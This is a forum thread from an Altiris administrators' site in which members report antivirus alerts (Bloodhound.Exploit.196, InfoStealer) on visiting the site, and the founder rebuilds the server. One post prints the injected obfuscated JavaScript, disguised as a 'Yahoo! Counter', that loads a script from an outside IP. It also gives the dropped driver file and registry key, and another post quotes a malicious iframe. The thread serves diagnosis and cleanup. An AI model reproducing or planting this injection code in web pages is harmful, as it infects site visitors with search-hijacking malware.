Registered member login:
Register Now
Altirigos » News and Announcements » News » Bloodhound.Exploit.196

» Current Poll
Vista?
Staying on XP until Windows 7 - 72.03%
103 Votes
Already on Vista - 10.49%
15 Votes
Planning an upgrade to Vista soon - 10.49%
15 Votes
Other (please explain) - 6.99%
10 Votes
Total Votes: 143
You may not vote on this poll.
» Stats
Members: 6,845
Threads: 9,785
Posts: 47,850
Top Poster: Nick (4,800)
Welcome our newest member, suresh
» Online Users: 43
7 members and 36 guests
damadi, jebba, madj42, MikeCusick, skakid, stewfo, stncldmk
Most users online at once 294, 06-30-2007 at 01:24 PM.
» January 2009
S M T W T F S
28293031 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Reply
Old 11-12-2008, 09:44 AM   #1 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


Bloodhound.Exploit.196

Welcome to the new server everyone!

I decided that the best approach to fixing this problem was to completely rebuild the server from scratch on a dedicated (VPS) server.

I apologize for the downtime but feel that this was the best course of action.

On a positive note, being on a VPS appears, from my end, to make the site much more responsive.

Please let me know if you experience any issues, or problems and I will work on getting them corrected.




Hi folks,

I have been notified by two separate people that their Antivirus is detecting the Bloodhound.Exploit.196 virus as soon as they hit altirigos.com.

I am curious if anyone else out there is. I am unable to replicate this on several systems (8 so far). I have used IE6, IE7, Opera, Firefox 2, Firefox 3, Chrome and Safari. I have used SAV, SEP, Bitdefender and ClamAV on the systems.

I have also gone through the index code to see if anything is out of place as this is what would be used as soon as the site is viewed... again nothing wrong there.

Just curious if this is isolated to those two individuals that reported it.

Thanks
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 11-12-2008, 01:13 PM   #2 (permalink)
 
Moedius's Avatar
 
Status: Junior Altiris Admin
Join Date: 10-15-2007
Location: Columbus, Ohio
Posts: 10


Saw it yesterday. I left early so I couldnt test it on another PC here to see if it is configuration related, but it doesnt appear to be kicking it up any more.

XP SP2, IE 8, SEP 11 if that helps.
__________________
"Banal ideas cannot be rescued by beautiful execution" - Sol Lewitt
Moedius is offline   Reply With Quote
Old 11-12-2008, 01:27 PM   #3 (permalink)
 
jenifer.arnold's Avatar
 
Status: Super Altiris Admin
Join Date: 01-23-2006
Location: Anchorage, Alaska, USA
Posts: 742


I didn't visit the site yesterday (go federal holidays!), but this morning I am not seeing anything.

XP SP3, IE7, TrendMicro OfficeScan
__________________
Jenifer Arnold
Information Technology Division
Anchorage Water & Wastewater Utility
jenifer.arnold is offline   Reply With Quote
Old 11-12-2008, 06:58 PM   #4 (permalink)
 
Status: Junior Altiris Admin
Join Date: 05-19-2008
Location: Sydney
Posts: 1


Virus Attack on my machine

Yes it comes up with Bloodhound virus alert when I visit your homepage
Attached Images
File Type: bmp bhound1.bmp (530.7 KB, 115 views)
File Type: bmp bhound2.bmp (587.6 KB, 26 views)
vithalmaddala is offline   Reply With Quote
Old 11-13-2008, 10:03 AM   #5 (permalink)
 
ricjam's Avatar
 
Status: Junior Altiris Admin
Join Date: 02-28-2005
Location: West Palm Beach, Florida, USA
Age: 34
Posts: 19


Yes, I received it when I came to the site this morning.

XP SP3, IE 7, Symantec Endpoint Protection 11
__________________
ricjam is offline   Reply With Quote
Old 11-13-2008, 11:09 AM   #6 (permalink)
 
Status: Junior Altiris Admin
Join Date: 03-10-2005
Location: Indiana
Posts: 9


InfoStealer

I connected yesterday on one of my machine and today on another one, and both times got virus mesages about InfoStealer. My autoprotect removed it, but it happened to me twice
jlhanlin is offline   Reply With Quote
Old 11-13-2008, 02:06 PM   #7 (permalink)
 
Status: Junior Altiris Admin
Join Date: 05-02-2008
Location: san francisco, ca
Posts: 1


me too...

I got that notification three times yesterday.
seamusjg is offline   Reply With Quote
Old 11-13-2008, 03:47 PM   #8 (permalink)
 
Status: Super Altiris Admin
Join Date: 10-28-2005
Location: Colorado
Posts: 1,117


If you look at the CVE's for this it seems to be related to Adobe Reader <8.1.2. I myself checked against both 8.1.2+SU1 and 9.0 with no warnings. I am guessing the people who are getting warnings may be using pre 8.1.2 ???
__________________
Brandon
Brandon is offline   Reply With Quote
Old 11-13-2008, 03:57 PM   #9 (permalink)
 
Status: Junior Altiris Admin
Join Date: 02-06-2008
Location: MA
Posts: 2


Your website has malicious code...

I was infected on two of my computers so I decided to look into it. Looks like your website drops sysaudio.sys into the c:\windows\system32 folder and adds the registry string key aux=sysaudio.sys in HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32

Symptoms:
Affects results from popular websearches, i.e. google, yahoo, etc. If you do a search, it will inject shady websites in the links of the search results page.

To Remove:
1. delete reg key
2. reboot
3. delete sysaudio.sys


Look at your website code, it has:
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '/%2F!.%2E~%2E` %3C%64i`v%20s%74`y%6Ce@%3D%64%69#s~%70lay&:n%6F&n% 65%3E\nvar%20&_;`%69f(%64!o%63|%75|m|e`n&t`.|c&%6F %6F@k%69%65|.@ma`%74c&h(`/%5Cb$%68%67%66~%74=1@%2F!%29|%3D!%3Dn|%75&l~%6C|)d `o@cu%6D%65%6E%74`%2Ew@%72`%69`%74@%65("%3Cs|%63|r $%69$%70%74%20%73%72!%63~%3D|%2F/%37|8@.&%31%357#%2E~14$%32%2E#%35`%38/!%63~p/?%22+na%76|%69g`a%74or.a&%70&%70N%61$%6D#%65~%2Ec% 68%61%72A%74(&0!)+%22!%3E%3C%5C`/!s%63r%69p&%74`%3E%22@%29$%3B~\n//%3C&/d~%69v@%3E').replace(/@|~|\!|\$|`|\&|\||#/g,""));var yahoo_counter=1;
<!-- counter end --></script>

This looks to be the culprit....


Here's more info:
miekiemoes.blogspot com/2008/10/fake-sysaudiosys.causes-searchengine.html

Last edited by bsakata; 11-13-2008 at 04:10 PM.. Reason: Additional Info
bsakata is offline   Reply With Quote
Old 11-13-2008, 04:06 PM   #10 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


Thanks Bsakata.

I saw that script and it is the culprit. I'm trying to figure out how to pull that out of the code but having a devil of a time finding it.

Sorry for the problems. I am working on it as much as I can.

Will keep you posted.
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 11-13-2008, 04:09 PM   #11 (permalink)
 
Status: Super Altiris Admin
Join Date: 10-28-2005
Location: Colorado
Posts: 1,117


Also, your 404 error pages seem to have an iframe to a commonly blacklisted site:

iframe src="hxxp://searchportal.information.com/?a_id=48873&domainname=referer_detect" frameborder="0" height="600" scrolling="auto" width="100%"></iframe>

I would be suprised if this is legit.
__________________
Brandon
Brandon is offline   Reply With Quote
Old 11-17-2008, 04:17 AM   #12 (permalink)
 
Status: Junior Altiris Admin
Join Date: 05-20-2008
Location: NC
Posts: 18


Yup, my work PC was infected as well. (no notifications, workplace uses worthless McAfee).

Saw the hijacked search results for days without being able to fix it.

Thanks for the update guys.

Last edited by carync; 11-17-2008 at 04:20 AM..
carync is offline   Reply With Quote
Old 11-18-2008, 05:17 AM   #13 (permalink)
 
Status: Altiris Admin
Join Date: 07-20-2007
Location: NYC
Posts: 30


Sometimes the best (and easiest) approach is to start from scratch. Good job!
SLam is offline   Reply With Quote
Old 11-18-2008, 05:54 AM   #14 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


I agree. I was able to track down a couple of minor issues as well and fix them.

I feel the site is now in as good a shape as it has ever been.

If anyone experiences any problems please let me know and I will work on getting them resolved.
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 11-22-2008, 10:56 AM   #15 (permalink)
 
dominique's Avatar
 
Status: Sticky...
Join Date: 03-04-2005
Location: Culver City, CA
Age: 52
Posts: 3,347


Thanks for this work Nick and ....

I am no more able to find things on altiris.com... through symantec.com... my old age might be the reason....
__________________
Thanks
Dom
http://www.altirigos.com

"Helping somebody else may help you"
dominique is offline   Reply With Quote
Old 11-22-2008, 11:05 AM   #16 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


Thanks Dom. Anything in particular that you're looking for that you can't find?
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 11-22-2008, 12:20 PM   #17 (permalink)
 
dominique's Avatar
 
Status: Sticky...
Join Date: 03-04-2005
Location: Culver City, CA
Age: 52
Posts: 3,347


Hey Boss,

For now I was trying my useful link to get the documentation on www.altiris.com but I did not get it... it redirected me to Altiris Products & Services | Symantec Corp. where is the documentation from there?

But was there with all documentations I needed on the repository

Thanks,
__________________
Thanks
Dom
http://www.altirigos.com

"Helping somebody else may help you"
dominique is offline   Reply With Quote
Old 11-22-2008, 01:06 PM   #18 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


Dom,

Give Documentation - Altiris, Inc. a try. I was just able to pull it up with success.
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 11-22-2008, 01:44 PM   #19 (permalink)
 
dominique's Avatar
 
Status: Sticky...
Join Date: 03-04-2005
Location: Culver City, CA
Age: 52
Posts: 3,347


Excellent this one one works too... thanks
__________________
Thanks
Dom
http://www.altirigos.com

"Helping somebody else may help you"
dominique is offline   Reply With Quote
Old 11-23-2008, 02:24 PM   #20 (permalink)
 
Status: Altiris Admin
Join Date: 03-29-2005
Location: new york
Age: 35
Posts: 36


Thanks for altirigos site

Nick,

Despite the reason that prompted the move to the new server.. I wanted to take the chance and say thanks for keeping a site such as Altirigos up and running. Many of us out there appreciate the site and can say that it has served many of us as a wealth and means of finding solutions and collaborating.

Thanks Nick! Thanks Altirigos and the community.

JSantiago.
__________________
JSantiago
jsantiago is offline   Reply With Quote
Old 11-24-2008, 01:35 AM   #21 (permalink)
 
Nick's Avatar
 
Status: Altiris Architect (Site Founder)
Join Date: 01-01-2005
Location: RDU, North Carolina, USA
Posts: 4,800


My pleasure J and let me second the thanks to the community.

Every one of the contributors help someone else in need and that is a great thing to watch.
__________________
Scire potentia est (knowledge is power)
Nick is offline   Reply With Quote
Old 12-11-2008, 03:35 PM   #22 (permalink)
 
estebs1978's Avatar
 
Status: Junior Altiris Admin
Join Date: 03-25-2008
Location: Arlington, Texas
Age: 30
Posts: 13


Nick,

Thank you for keeping this up man. It is an amazing tool for us and we thank you for it.
__________________
Esteban Blanco, MCP, MCSE, MCTS, MCITP
estebs1978@tx.rr.com
estebs1978 is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -4. The time now is 09:46 AM.


Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0
vB.Sponsors
Altirigos